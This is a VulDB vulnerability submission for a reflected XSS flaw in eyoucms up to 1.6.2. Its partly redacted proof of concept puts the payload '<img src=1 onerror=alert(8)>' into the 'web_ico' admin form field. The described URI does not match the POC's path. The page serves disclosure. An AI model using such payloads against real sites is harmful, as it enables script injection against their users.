Submit #111320: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability info

Titeleyoucms up to 1.6.2 'web_ico' reflected xss vulnerability
Beschreibungeyoucms up to 1.6.2 has a xss vulnerability The vulnerable uri is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4 and the vulnerable multipart parameter is name="web_ico" POC below: POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1 ***************************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy ******************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy Content-Disposition: form-data; name="web_ico" <img src=1 onerror=alert(8)> ------WebKitFormBoundaryq3khRwDr0dBifJAy ********************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy-- see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md
Quelle⚠️ https://www.eyoucms.com/
Benutzer
 WWesleywww (UID 43117)
Einreichung07.04.2023 15:36 (vor 3 Jahren)
Moderieren14.04.2023 10:36 (7 days later)
StatusAkzeptiert
VulDB Eintrag225943 [EyouCms bis 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico Cross Site Scripting]
Punkte17

ZurückÜbersichtWeiter

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!